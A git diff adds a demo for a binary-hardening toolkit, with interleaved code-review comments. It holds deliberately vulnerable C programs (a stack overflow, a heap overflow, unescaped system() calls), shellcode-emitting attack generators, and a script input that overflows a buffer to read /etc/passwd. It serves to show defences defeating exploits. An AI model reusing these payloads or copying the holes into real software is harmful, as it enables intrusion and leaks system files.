diff --git a/.gitattributes b/.gitattributes index 1e249cf3af9cf30f89a2fded9877a8d51282bd6f..84b25593026e81e2f6482903e05472e449a0cd33 100644 --- a/.gitattributes +++ b/.gitattributes @@ -2,6 +2,20 @@ /Makefile -text chopzero_src/Makefile -text chopzero_src/chopzero.c -text +demos/demo.aug_9_2011/Makefile -text +demos/demo.aug_9_2011/dumbledore.c -text +demos/demo.aug_9_2011/dumbledore.exploits/Makefile -text +demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeA.no_strata.c -text +demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeB.no_strata.c -text +demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_parm1.c -text +demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_tracing.c -text +demos/demo.aug_9_2011/dumbledore.exploits/badA.txt -text +demos/demo.aug_9_2011/dumbledore.exploits/badB.txt -text +demos/demo.aug_9_2011/dumbledore.good_inputs/good.txt -text +demos/demo.aug_9_2011/heap_overflow.c -text +demos/demo.aug_9_2011/help.txt -text +demos/demo.aug_9_2011/ps_demo.sh -text +demos/demo.aug_9_2011/sample.txt -text demos/demo.jan_21_2011/Makefile -text demos/demo.jan_21_2011/demo_analyze.sh -text demos/demo.jan_21_2011/dumbledore.c -text diff --git a/demos/demo.aug_9_2011/Makefile b/demos/demo.aug_9_2011/Makefile new file mode 100644 index 0000000000000000000000000000000000000000..5923ac840298d0cf73d54e34328d168b31467822 --- /dev/null +++ b/demos/demo.aug_9_2011/Makefile 
@@ -0,0 +1,26 @@ +TOOLBASE=${PEASOUP_HOME}/tools + +all: dumbledore.original dumbledore.protected heap_overflow.original heap_overflow.protected + +heap_overflow.original: heap_overflow.o + ${TOOLBASE}/ps_link.sh heap_overflow.o -o heap_overflow.original + +heap_overflow.protected: heap_overflow.original + ${TOOLBASE}/ps_analyze.sh heap_overflow.original heap_overflow.protected + echo "Note: this step will end in an error for now, but that's OK" + +dumbledore.original: dumbledore.o + ${TOOLBASE}/ps_link.sh dumbledore.o -o dumbledore.original + +dumbledore.protected: dumbledore.original + ${TOOLBASE}/ps_analyze.sh dumbledore.original dumbledore.protected + echo "Note: this step will end in an error for now, but that's OK" + +.c.o: + ${TOOLBASE}/ps_comp.sh $< + +clean: + rm -f *.o heap_overflow.original heap_overflow.protected dumbledore.original dumbledore_cmd.original dumbledore.protected dumbledore_cmd.protected tmp + rm -Rf peasoup_executable_directory.* + # clean up IRDB and reset tables + if [ ! "X" = "X"${PGUSER} ]; then sh ${TOOLBASE}/db/drop_my_tables.sh; sh ${TOOLBASE}/db/pdb_setup.sh; fi diff --git a/demos/demo.aug_9_2011/dumbledore.c b/demos/demo.aug_9_2011/dumbledore.c new file mode 100644 index 0000000000000000000000000000000000000000..02e2f05c1105deb85faf5281272fda79cb817f74 --- /dev/null +++ b/demos/demo.aug_9_2011/dumbledore.c 
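Review bot: The `dumbledore.protected` and `heap_overflow.protected` recipes run `ps_analyze.sh` unprefixed, so when it exits nonzero (which the following echo says is expected) make aborts the target before that echo ever runs and `all` fails; if the failure really is expected, the command line should be `-${TOOLBASE}/ps_analyze.sh heap_overflow.original heap_overflow.protected` (and likewise for dumbledore), otherwise the note should go. The `clean` target also drops and re-creates the IRDB tables via `drop_my_tables.sh`/`pdb_setup.sh` whenever PGUSER is set, a side effect well beyond removing build artifacts; a comment such as `# NOTE: clean also drops and re-creates this user's IRDB tables` or a separate `dbclean` target would make that explicit. The test `[ ! "X" = "X"${PGUSER} ]` leaves `${PGUSER}` unquoted; `[ -n "${PGUSER}" ]` is the conventional, quote-safe form.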
@@ -0,0 +1,47 @@
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+enum {BUFSIZE = 98};
+
+char grade = 'D';
+char Name[BUFSIZE];
+FILE *f;
+
+void readString(char *s) {
+ char buf[BUFSIZE];
+ int i = 0;
+ int c;
+
+ for (;;)
+ {
+ c = getchar();
+ if ((c == EOF) || (c == '\n'))
+ break;
+ buf[i] = c;
+ i++;
+ }
+ buf[i] = '\0';
+
+ for (i = 0; i < BUFSIZE; i++)
+ s[i] = buf[i];
+}
+
+
+int main(void)
+{
+ mprotect((void*)((unsigned int)Name & 0xfffff000), 1,
+ PROT_READ | PROT_WRITE | PROT_EXEC);
+ readString(Name);
+
+ if (strcmp(Name, "Wizard in Training") == 0)
+ grade = 'B';
+
+ printf("Thank you, %s.\n", Name);
+ printf("I recommend that you get a grade of %c on this assignment.\n", grade);
+
+ exit(0);
+}
+
diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/Makefile b/demos/demo.aug_9_2011/dumbledore.exploits/Makefile
new file mode 100644
index 0000000000000000000000000000000000000000..1db272320fd9b27f577c518da9805eaa5fa52475
--- /dev/null
+++ b/demos/demo.aug_9_2011/dumbledore.exploits/Makefile
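Review bot: `readString` stores into `buf[BUFSIZE]` with no bound on `i`, and the second loop then copies all `BUFSIZE` bytes into `s` regardless of the string's actual length; since this file is the demo's deliberately vulnerable target, a header comment saying so (`/* Deliberately vulnerable demo target: readString has no bounds check. */`) keeps it from being copied as a pattern. `(unsigned int)Name & 0xfffff000` truncates the pointer on a 64-bit build (`uintptr_t` with `~(sysconf(_SC_PAGESIZE) - 1)` is the portable form) and the return value of `mprotect` is unchecked, so where the call fails the demo silently runs without the page permissions it expects. `FILE *f` is declared and never used.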
@@ -0,0 +1,30 @@ +# This file contains rules to build attack generators for the dumbledore example +# which uses file input. +# attack-gradeXXX.no_strata is the attack generator for a non-stratafied +# application +# The attack generator for stratafied application may need +# to be slightly different +PS_TOOLBASE=${PEASOUP_HOME}/tools + +all: attack-gradeA attack-gradeB attack-strata_tracing + +attack-strata_tracing: attack-strata_tracing.o + ${PS_TOOLBASE}/ps_link.sh attack-strata_tracing.o -o attack-strata_tracing + +attack-strata_parm1: attack-strata_parm1.o + ${PS_TOOLBASE}/ps_link.sh attack-strata_parm1.o -o attack-strata_parm1 + +attack-gradeA.no_strata: attack-gradeA.no_strata.o + ${PS_TOOLBASE}/ps_link.sh attack-gradeA.no_strata.o -o gradeA.no_strata + +attack-gradeB.no_strata: attack-gradeB.no_strata.o + ${PS_TOOLBASE}/ps_link.sh attack-gradeB.no_strata.o -o gradeB.no_strata + +attack-graCE_infinite: attack-graCE_infinite.o + ${PS_TOOLBASE}/ps_link.sh attack-graCE_infinite.o -o graCE_infinite + +.c.o: + ${PS_TOOLBASE}/ps_comp.sh $< + +clean: + rm gradeA.no_strata gradeB.no_strata attack-strata_tracing attack-graCE_infinite attack-strata_parm1 *.o diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeA.no_strata.c b/demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeA.no_strata.c new file mode 100755 index 0000000000000000000000000000000000000000..097546fa85000982683b0a674bef5fad5eb3cbfa --- /dev/null +++ b/demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeA.no_strata.c 
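Review bot: `all` lists `attack-gradeA` and `attack-gradeB`, but the only rules defined are `attack-gradeA.no_strata` and `attack-gradeB.no_strata`, so `make` stops with "No rule to make target"; the dependency line should read `all: attack-gradeA.no_strata attack-gradeB.no_strata attack-strata_tracing`. Those two rules also write their output to `gradeA.no_strata`/`gradeB.no_strata`, names that differ from the target, so make re-links them on every run; aligning the `-o` name with the target fixes that. The `attack-graCE_infinite` rule refers to a source that is not part of this commit (the `.gitattributes` hunk above adds no such file), so it cannot build and its `clean` entry is dead. `clean` uses `rm` without `-f` and so errors on the first missing file; `rm -f` matches the top-level Makefile.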
@@ -0,0 +1,58 @@ +#include <stdio.h> +#include <string.h> + /* stack location address */ +char attackString[] = + "Ja" /* 0xbfffefa6 */ /* Name: 0x80c80c0 */ + "ck D" /* 0xbfffefa8 */ /* Name: 0x80c80c2 */ + "avid" /* 0xbfffefac */ /* Name: 0x80c80c6 */ + "son\x00" /* 0xbfffefb0 */ /* Name: 0x80c80ca */ + "\xc6\x05\x08\x60" /* 0xbfffefb4 */ /* Name: 0x80c80ce */ /* movb $0x41,0x080c6008 addr of grade */ + "\x0c\x08\x41\x90" /* 0xbfffefb8 */ /* nop is \x90 */ + "\x68\xf7\x82\x04" /* 0xbfffefbc */ /* op 68 is push ret addr 0x080482f7 */ + "\x08\x90\xc3\x3e" /* 0xbfffefc0 */ /* nop is \x90; c3 is ret inst */ + "\x20\x20\x20\x20" /* 0xbfffefc4 */ + "\x20\x20\x20\x20" /* 0xbfffefc8 */ + "\x20\x20\x20\x20" /* 0xbfffefcc */ + "\x20\x20\x20\x20" /* 0xbfffefd0 */ + "\x20\x20\x20\x20" /* 0xbfffefd4 */ + "\x20\x20\x20\x20" /* 0xbfffefd8 */ + "\x20\x20\x20\x20" /* 0xbfffefdc */ + "\x20\x20\x20\x20" /* 0xbfffefe0 */ + "\x20\x20\x20\x20" /* 0xbfffefe4 */ + "\x20\x20\x20\x20" /* 0xbfffefe8 */ + "\x20\x20\x20\x20" /* 0xbfffefec */ + "\x20\x20\x20\x20" /* 0xbfffeff0 */ + "\x20\x20\x20\x20" /* 0xbfffeff4 */ + "\x20\x20\x20\x20" /* 0xbfffeff8 */ + "\x20\x20\x20\x20" /* 0xbfffeffc */ + "\x20\x20\x20\x20" /* 0xbffff000 */ + "\x20\x20\x20\x20" /* 0xbffff004 */ + "\x62\x00\x00\x00" /* 0xbffff008 */ /* i here */ + "\x20\x20\x20\x20" /* 0xbffff00c */ /* c here */ + "\x20\x20\x20\x20" /* 0xbffff010 */ + "\x20\x20\x20\x20" /* 0xbffff014 */ + "\x38\xf0\xff\xbf" /* 0xbffff018 */ /* ebp aka frame ptr */ + "\xce\x80\x0c\x08" /* 0xbffff01c */ /* return address should b + the addr of Name + where injection code is + 0x80c80ce */ + "\xc0\x80\x0c\x08" /* 0xbffff020 */ /* address of Name */ + "\x0a\x0a\x0a\x0a" ; /* 0xbffff024 */ +/* The key to the attack is to change the return address (located on the + stack at address 0x22cc7c as indicated in the above picture to + point to the code location in main where the grade is set to a "B". 
+ However, it is also important for the buffer overrun to preserve the + frame pointer and the address of grade on the stack (grade is passed and s + points to it +*/ + + +int main() { + int i; + char *p = attackString; + for (i = 0; i < sizeof(attackString); i++) { + putchar(*p); + p++; + } + return 1; +} diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeB.no_strata.c b/demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeB.no_strata.c new file mode 100644 index 0000000000000000000000000000000000000000..799646630e86d53e854c28f52c56cf9dc1279aa5 --- /dev/null +++ b/demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeB.no_strata.c 
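Review bot: In `main`, `i` is an `int` compared against `sizeof(attackString)` (a `size_t`), which trips `-Wsign-compare`, and `main` returns 1 on its only path, so any caller that checks the exit status (a shell `&&`, `set -e`) treats the generator as failed; `size_t i` and `return 0` fix both. The same `main` is duplicated verbatim in attack-gradeB.no_strata.c, attack-strata_parm1.c and attack-strata_tracing.c. The address annotations in the comments are only meaningful for one specific build of dumbledore.original; a header comment recording the build they were taken from would explain why the generator produces a different result elsewhere. The trailing comment also refers to "the above picture" and a stack address (0x22cc7c) that do not appear in this file, and `<string.h>` is included but unused.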
@@ -0,0 +1,47 @@ +#include <stdio.h> +#include <string.h> + /* stack location address */ +char attackString[] = "Ja" /* 0x0bfffefa6 */ + "ck D" /* 0x0bfffefa8 */ + "avid" /* 0x0bfffefac */ + "son\x00" /* 0x0bfffefb0 */ + "\xc6\x05\x20\x20" /* 0x0bfffefb4 */ + "\x40\x20\x41\x90" /* 0x0bfffefb8 */ + "\x68\x33\x11\x40" /* 0x0bfffefbc */ + "\x00\x90\xc3\x3e" /* 0x0bfffefc0 */ + "\x20\x20\x20\x20" /* 0x0bfffefc4 */ + "\x20\x20\x20\x20" /* 0x0bfffefc8 */ + "\x20\x20\x20\x20" /* 0x0bfffefcc */ + "\x20\x20\x20\x20" /* 0x0bfffefd0 */ + "\x20\x20\x20\x20" /* 0x0bfffefd4 */ + "\x20\x20\x20\x20" /* 0x0bfffefd8 */ + "\x20\x20\x20\x20" /* 0x0bfffefdc */ + "\x20\x20\x20\x20" /* 0x0bfffefe0 */ + "\x20\x20\x20\x20" /* 0x0bfffefe4 */ + "\x20\x20\x20\x20" /* 0x0bfffefe8 */ + "\x20\x20\x20\x20" /* 0x0bfffefec */ + "\x20\x20\x20\x20" /* 0x0bfffeff0 */ + "\x20\x20\x20\x20" /* 0x0bfffeff4 */ + "\x20\x20\x20\x20" /* 0x0bfffeff8 */ + "\x20\x20\x20\x20" /* 0x0bfffeffc */ + "\x20\x20\x20\x20" /* 0x0bffff000 */ + "\x20\x20\x20\x20" /* 0x0bffff004 */ + "\x62\x00\x00\x00" /* 0x0bffff008 */ /* i here */ + "\x20\x20\x20\x20" /* 0x0bffff00c */ /* c here */ + "\x20\x20\x20\x20" /* 0x0bffff010 */ + "\x20\x20\x20\x20" /* 0x0bffff014 */ + "\x38\xf0\xff\xbf" /* 0x0bffff018 */ /* ebp */ + "\xfd\x82\x04\x08" /* 0x0bffff01c */ /* return addr */ + "\xc0\x80\x0c\x08" /* 0x0bffff020 */ /* addr Name */ + "\x0a\x0a\x0a\x0a" /* 0x0bffff024 */ + "\x0a\x0a\x0a\x0a"; /* 0x0bffff028 */ +int main() { + int i; + char *p = attackString; + for (i = 0; i < sizeof(attackString); i++) { + putchar(*p); + p++; + } + return 1; +} + diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_parm1.c b/demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_parm1.c new file mode 100644 index 0000000000000000000000000000000000000000..8731e83dd94128cb79c5bff647c3460475a23a0d --- /dev/null +++ b/demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_parm1.c 
@@ -0,0 +1,62 @@ +/* This attack generator attempts to overwrite the first parameter to + * readString with the address of one strata variable, strata_tracing + * Then when the copying of the buffer to the parameter is carried out, + * the value of strata_tracing can be changed to 1. + * + * strata_tracing is laid out next to the TI struct. + * For the program not to crash, + * the attack must preserve all the bytes of TI that might be overwritten. + * This means that the first 98 bytes (BUFSIZE) of the attackString should + * match the memory starting from strata_tracing, with the exception of the + * changed value of strata_tracing that is desired. + + */ + +#include <stdio.h> +#include <string.h> + /* stack location address */ +char attackString[] = "\x01\x00" /* 0x0bfffefa6 */ + "\x00\x00\x00\x00" /* 0x0bfffefa8 */ + "\x00\x00\x00\x00" /* 0x0bfffefac */ + "\x00\x00\x00\x00" /* 0x0bfffefb0 */ + "\x00\x00\x00\x00" /* 0x0bfffefb4 */ + "\x00\x00\x00\x00" /* 0x0bfffefb8 */ + "\x00\x00\x00\x00" /* 0x0bfffefbc */ + "\x00\x00\x00\x00" /* 0x0bfffefc0 */ + "\x00\x00\xd2\x27" /* 0x0bfffefc4 */ + "\x25\x09\x55\x12" /* 0x0bfffefc8 */ + "\x0d\x09\xfc\x27" /* 0x0bfffefcc */ + "\x25\x09\xb9\x67" /* 0x0bfffefd0 */ + "\x25\x09\x2e\x49" /* 0x0bfffefd4 */ + "\x25\x09\x7c\x51" /* 0x0bfffefd8 */ + "\x25\x09\x6e\x53" /* 0x0bfffefdc */ + "\x25\x09\x84\x5a" /* 0x0bfffefe0 */ + "\x25\x09\x10\xf6" /* 0x0bfffefe4 */ + "\x25\x09\xd9\x2c" /* 0x0bfffefe8 */ + "\x25\x09\xe3\x67" /* 0x0bfffefec */ + "\x25\x09\xf0\xd1" /* 0x0bfffeff0 */ + "\x25\x09\x30\x9d" /* 0x0bfffeff4 */ + "\x25\x09\xb4\x67" /* 0x0bfffeff8 */ + "\x25\x09\xff\x95" /* 0x0bfffeffc */ + "\x25\x09\x98\x18" /* 0x0bffff000 */ + "\x25\x09\x8e\x67" /* 0x0bffff004 */ + "\x62\x00\x00\x00" /* 0x0bffff008 */ /* i here */ + "\x20\x20\x20\x20" /* 0x0bffff00c */ /* c here */ + "\x20\x20\x20\x20" /* 0x0bffff010 */ + "\x20\x20\x20\x20" /* 0x0bffff014 */ + "\x38\xf0\xff\xbf" /* 0x0bffff018 */ /* ebp */ + "\xfd\x82\x04\x08" /* 0x0bffff01c */ 
/* return addr */ + "\x00\xe2\x33\x09" /* 0x0bffff020 */ + /* addr of parm 1, changed to addr of strata_tracing */ + "\x0a\x0a\x0a\x0a" /* 0x0bffff024 */ + "\x0a\x0a\x0a\x0a"; /* 0x0bffff028 */ +int main() { + int i; + char *p = attackString; + for (i = 0; i < sizeof(attackString); i++) { + putchar(*p); + p++; + } + return 1; +} + diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_tracing.c b/demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_tracing.c new file mode 100755 index 0000000000000000000000000000000000000000..82605289267e12b06a36299f226b3307dc77eebd --- /dev/null +++ b/demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_tracing.c 
@@ -0,0 +1,64 @@ +#include <stdio.h> +#include <string.h> + +/* This attack generator crafts a code injection attack which + * changes one of Strata's memory locations. In this instance + * strata_tracing will be changed to a value of 1 + * which will turn on tracing output + */ + /* stack location address */ +char attackString[] = + "Ja" /* 0xbfffefa6 */ /* Name: 0x80c80c0 */ + "ck D" /* 0xbfffefa8 */ /* Name: 0x80c80c2 */ + "avid" /* 0xbfffefac */ /* Name: 0x80c80c6 */ + "son\x00" /* 0xbfffefb0 */ /* Name: 0x80c80ca */ + "\xc6\x05\x00\xe2" /* 0xbfffefb4 */ /* Name: 0x80c80ce */ /* movb 0x1,0x0x0933e200 address of strata_tracing */ + "\x33\x09\x01\x90" /* 0xbfffefb8 */ /* nop is \x90 */ + "\x68\xf7\x82\x04" /* 0xbfffefbc */ /* op 68 is push ret addr 0x080482f7 */ + "\x08\x90\xc3\x3e" /* 0xbfffefc0 */ /* nop is \x90; c3 is ret inst */ + "\x20\x20\x20\x20" /* 0xbfffefc4 */ + "\x20\x20\x20\x20" /* 0xbfffefc8 */ + "\x20\x20\x20\x20" /* 0xbfffefcc */ + "\x20\x20\x20\x20" /* 0xbfffefd0 */ + "\x20\x20\x20\x20" /* 0xbfffefd4 */ + "\x20\x20\x20\x20" /* 0xbfffefd8 */ + "\x20\x20\x20\x20" /* 0xbfffefdc */ + "\x20\x20\x20\x20" /* 0xbfffefe0 */ + "\x20\x20\x20\x20" /* 0xbfffefe4 */ + "\x20\x20\x20\x20" /* 0xbfffefe8 */ + "\x20\x20\x20\x20" /* 0xbfffefec */ + "\x20\x20\x20\x20" /* 0xbfffeff0 */ + "\x20\x20\x20\x20" /* 0xbfffeff4 */ + "\x20\x20\x20\x20" /* 0xbfffeff8 */ + "\x20\x20\x20\x20" /* 0xbfffeffc */ + "\x20\x20\x20\x20" /* 0xbffff000 */ + "\x20\x20\x20\x20" /* 0xbffff004 */ + "\x62\x00\x00\x00" /* 0xbffff008 */ /* i here */ + "\x20\x20\x20\x20" /* 0xbffff00c */ /* c here */ + "\x20\x20\x20\x20" /* 0xbffff010 */ + "\x20\x20\x20\x20" /* 0xbffff014 */ + "\x38\xf0\xff\xbf" /* 0xbffff018 */ /* ebp aka frame ptr */ + "\xce\x80\x0c\x08" /* 0xbffff01c */ /* return address should b + the addr of Name + where injection code is + 0x80c80ce */ + "\xc0\x80\x0c\x08" /* 0xbffff020 */ /* address of Name */ + "\x0a\x0a\x0a\x0a" ; /* 0xbffff024 */ +/* The key to the attack is to change 
the return address (located on the + stack at address 0x22cc7c as indicated in the above picture to + point to the code location in main where the grade is set to a "B". + However, it is also important for the buffer overrun to preserve the + frame pointer and the address of grade on the stack (grade is passed and s + points to it +*/ + + +int main() { + int i; + char *p = attackString; + for (i = 0; i < sizeof(attackString); i++) { + putchar(*p); + p++; + } + return 1; +} diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/badA.txt b/demos/demo.aug_9_2011/dumbledore.exploits/badA.txt new file mode 100644 index 0000000000000000000000000000000000000000..2103f665448a25c644bb81f462b2bcc0a490453c Binary files /dev/null and b/demos/demo.aug_9_2011/dumbledore.exploits/badA.txt differ diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/badB.txt b/demos/demo.aug_9_2011/dumbledore.exploits/badB.txt new file mode 100644 index 0000000000000000000000000000000000000000..c3520ece5ad8b805d5f40c78ee09bfd1c0f002e1 Binary files /dev/null and b/demos/demo.aug_9_2011/dumbledore.exploits/badB.txt differ diff --git a/demos/demo.aug_9_2011/dumbledore.good_inputs/good.txt b/demos/demo.aug_9_2011/dumbledore.good_inputs/good.txt new file mode 100644 index 0000000000000000000000000000000000000000..eeae9c63ea9573190317c06a11a25f45d71bc738 --- /dev/null +++ b/demos/demo.aug_9_2011/dumbledore.good_inputs/good.txt @@ -0,0 +1 @@ +Jack Davidson diff --git a/demos/demo.aug_9_2011/heap_overflow.c b/demos/demo.aug_9_2011/heap_overflow.c new file mode 100644 index 0000000000000000000000000000000000000000..06c4aa1fe43eab816003982779af910b7d9e1f90 --- /dev/null +++ b/demos/demo.aug_9_2011/heap_overflow.c 
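Review bot: The trailing comment block is copied from attack-gradeA.no_strata.c and still says the attack points the return address at the code in main where the grade is set to a "B", which contradicts this file's own header comment stating that the injected code changes `strata_tracing`; it also references a picture and a stack address (0x22cc7c) that are not in this file. Either delete that block or rewrite it to match the header comment, so the two descriptions of what this generator does agree. The `movb` annotation on the `\xc6\x05\x00\xe2` line has a doubled `0x0x` prefix in the address.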
@@ -0,0 +1,54 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main(int argc, char * argv[])
+{
+ FILE *filed;
+ char *userinput=malloc(20);
+ char *outputfile=malloc(20);
+ char buf[256];
+
+ if (argc != 2)
+ {
+ printf("Usage: %s <file_to_open>\n", argv[0]);
+ exit(0);
+ }
+
+ // point outputfile at the help file
+ strcpy(outputfile, "help.txt");
+ strcpy(userinput, argv[1]);
+
+ // let's check out the memory addresses of userinput and outputfile
+ printf("userinput @ %p: %s\n",userinput,userinput);
+ printf("outputfile @ %p: %s\n", outputfile, outputfile);
+
+ // Do some error-checking: no /etc/passwd allowed as user input
+ if (strcmp("/etc/passwd",userinput)==0)
+ {
+ fprintf(stderr, "ERROR: You may not specify /etc/passwd as a file to view.\n");
+ exit(1);
+ }
+
+ filed = fopen(userinput, "r");
+ if (filed==NULL)
+ {
+ // if the file can't be opened, then print the help.txt
+ fprintf(stderr, "\nerror opening file %s\n", userinput);
+ sprintf(buf, "%s %s", "cat", outputfile);
+ system(buf);
+ exit(1);
+ }
+ else
+ {
+ printf("\nThe contents of %s are:\n", userinput);
+ fflush(stdout);
+ // print the word count of the file
+ sprintf(buf, "%s %s", "cat", userinput);
+ system(buf);
+ }
+
+ // fprintf(filed, "%s\n", userinput);
+ fclose(filed);
+ return 0;
+}
diff --git a/demos/demo.aug_9_2011/help.txt b/demos/demo.aug_9_2011/help.txt
new file mode 100644
index 0000000000000000000000000000000000000000..3fc3f4f685b073e23c81ad68f4d467b56c4a21c6
--- /dev/null
+++ b/demos/demo.aug_9_2011/help.txt
@@ -0,0 +1,8 @@
+#
+#
+# This is a help.txt file
+# It contains information about
+# the usage of this program
+# and arguments that may be passed.
+#
+#
diff --git a/demos/demo.aug_9_2011/ps_demo.sh b/demos/demo.aug_9_2011/ps_demo.sh
new file mode 100755
index 0000000000000000000000000000000000000000..152b61c9ab456bbff39893c97d59e12920dd234d
--- /dev/null
+++ b/demos/demo.aug_9_2011/ps_demo.sh
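Review bot: Besides the deliberate `malloc(20)` plus unbounded `strcpy(userinput, argv[1])` overflow the demo is built around, the file carries a second, undocumented defect class: `sprintf(buf, "%s %s", "cat", userinput); system(buf)` passes the user-supplied argument to a shell unescaped, and `buf[256]` can itself be overrun by a long argument, so a run that never reaches the heap overflow can still misbehave. Since the demo script describes only the heap overflow, a header comment listing the intentional defects (`// Deliberately vulnerable demo: unbounded strcpy into 20-byte heap buffers; sprintf/system on user input`) keeps the intended lesson separate from incidental ones. Both `malloc` results are unchecked, the comment `// print the word count of the file` does not describe the `cat` it annotates, and the commented-out `// fprintf(filed, ...)` line is dead text that should be removed.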
@@ -0,0 +1,164 @@ +#!/bin/sh + +if [ "${PEASOUP_HOME}x" = "x" ]; then + echo "environment variable: PEASOUP_HOME is empty." + echo "PEASOUP_HOME must be defined to point at a valid peasoup_examples directory" + exit 1 +fi + +if [ "${STRATA}x" = "x" ]; then + echo "environment variable: STRATA is empty. " + echo "STRATA must be defined to point at a valid Strata security branch" + exit 1 +fi + +# if the executable hasn't been built, then build it! +if [ ! -f dumbledore.original ]; then + make dumbledore.original +fi + +TOOLBASE=${PEASOUP_HOME}/tools + +# A pause function +Pause() +{ + key="" + echo -n "\nPress any key to continue...\n" + echo + stty -icanon + key=`dd count=1 2>/dev/null` + stty icanon +} + +# N.B. - Assumes that dumbledore.original has already been built. +# clear the screen +clear +# 1) Run dumbledore_cmd.original with good input +echo "Running dumbledore.original with a non-malicious input\n\n" +good_input=`cat dumbledore.good_inputs/good.txt` +echo "Input: ${good_input}\n" + +echo "./dumbledore.original < dumbledore.good_inputs/good.txt\n" + +Pause + +./dumbledore.original < dumbledore.good_inputs/good.txt + +Pause + +# clear screen before doing the next step +clear + +# 2) Run dumbledore.original with a bad input that PEASOUP can catch +# input is too long and overwrites return address and base pointer + +echo "Running dumbledore.original with CODE INJECTION input.\nReported grade will be changed from D to A.\n" + +bad_input=`cat dumbledore.exploits/badA.txt` +echo "Input: ${bad_input}\n\n" +echo "./dumbledore.original < dumbledore.exploits/badA.txt\n" + +Pause + +./dumbledore.original < dumbledore.exploits/badA.txt + +Pause +clear + +# 3) Run dumbledore.protected on bad input A, show defeat of exploit +echo "At 6-month review: Instruction Set Randomization" +echo "Running PEASOUP-protected dumbledore on CODE INJECTION input.\n" +echo "PEASOUP detects the code injection.\n" + +bad_input=`cat dumbledore.exploits/badA.txt` +echo "Input: 
${bad_input}\n\n" +echo "./dumbledore.protected < dumbledore.exploits/badA.txt\n" + +Pause + +./dumbledore.protected < dumbledore.exploits/badA.txt + +Pause +# clear the screen +clear + +# 4) Run dumbledore.original on ARC INJECTION input +echo "Running dumbledore.original with ARC INJECTION input\n" +echo "Input will cause username check to be bypassed." +echo "Reported grade will be B, instead of the expected D.\n" +bad_input=`cat dumbledore.exploits/badB.txt` +echo "Input: ${bad_input}\n\n" +echo "./dumbledore.original < dumbledore.exploits/badB.txt\n" + +Pause + +./dumbledore.original < dumbledore.exploits/badB.txt + +Pause +clear + +# 5) Run dumbledore.protected on bad input #2, show that we did not defeat the exploit +echo "NEW since 6-month review: Instruction Layout Randomization" +echo "Running PEASOUP-protected dumbledore with arc injection attack input\n\n" +badBinput=`cat dumbledore.exploits/badB.txt` +echo "Input: ${badBinput}\n\n" +echo "./dumbledore.protected < dumbledore.exploits/badB.txt\n" + +Pause + +./dumbledore.protected < dumbledore.exploits/badB.txt + + +Pause +clear +# 6) Run heap overflow original on some sample inputs +echo "Heap overflow example: non-malicious inputs" +echo "Program takes a filename as an argument and cat's the file." +echo "Input: sample.txt\n\n" +echo "./heap_overflow.original sample.txt\n" + +Pause + +./heap_overflow.original sample.txt + +Pause +clear + +echo "Heap overflow example: another non-malicious input" +echo "Input: /etc/passwd\n\n" +echo "./heap_overflow.original /etc/passwd\n" + +Pause + +./heap_overflow.original /etc/passwd + + +Pause +clear + +echo "Heap overflow example: malicious input" +echo "Overflow heap buffer to try and leak sensitive information." 
+echo "Input: 012345678901234567890123/etc/passwd\n\n" +echo "./heap_overflow.original 012345678901234567890123/etc/passwd\n" + +Pause + +./heap_overflow.original 012345678901234567890123/etc/passwd + + +Pause +clear + +# 7) Run PS_analyzed heap overflow +echo "NEW since 6-month review: Heap Randomization" +echo "Running PEASOUP-protected heap_overflow on malicious input" +echo "Input: 012345678901234567890123/etc/passwd\n\n" +echo "./heap_overflow.protected 012345678901234567890123/etc/passwd\n" + +Pause + +./heap_overflow.protected 012345678901234567890123/etc/passwd + +echo +echo +echo "END of DEMO" diff --git a/demos/demo.aug_9_2011/sample.txt b/demos/demo.aug_9_2011/sample.txt new file mode 100644 index 0000000000000000000000000000000000000000..4c7b3c71801fdcf4edcb0867f23586c67e62ffb8 --- /dev/null +++ b/demos/demo.aug_9_2011/sample.txt @@ -0,0 +1,41 @@ + +int main(int argc, char * argv[]) +{ + FILE *filed; + char *userinput=malloc(20); + char *outputfile=malloc(20); + char buf[256]; + + // point outputfile at the help file + strcpy(outputfile, "help.txt"); + strcpy(userinput, argv[1]); + + // Do some error-checking: no /etc/passwd allowed as user input + if (strcmp("/etc/passwd",userinput)==0) + { + fprintf(stderr, "ERROR: You may not specify /etc/passwd as a file to view.\n"); + exit(1); + } + + filed = fopen(userinput, "r"); + if (filed==NULL) + { + // if the file can't be opened, then print the help.txt + fprintf(stderr, "\nerror opening file %s\n", userinput); + sprintf(buf, "%s %s", "cat", outputfile); + system(buf); + exit(1); + } + else + { + printf("\nThe contents of %s are:\n", userinput); + fflush(stdout); + // print the word count of the file + sprintf(buf, "%s %s", "cat", userinput); + system(buf); + } + + // fprintf(filed, "%s\n", userinput); + fclose(filed); + return 0; +}
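Review bot: The build guard near the top only checks for `dumbledore.original`, yet the script later executes `dumbledore.protected`, `heap_overflow.original` and `heap_overflow.protected`, so on a fresh checkout the demo fails partway through step 3; running `make all` (or one existence check per binary) before the first `clear` covers all four. The script is `#!/bin/sh` but relies on `echo` expanding `\n` and on `echo -n`, which `dash` and `bash` treat differently, so the prompts and blank lines render inconsistently; `printf` is the portable form. `Pause` sets `stty -icanon` and restores it only after `dd` returns, so an interrupt at the prompt leaves the terminal in non-canonical mode; a `trap 'stty icanon' INT EXIT` at the top, or a `stty -g` save/restore, addresses that. The `key` variable in `Pause` is assigned and never read.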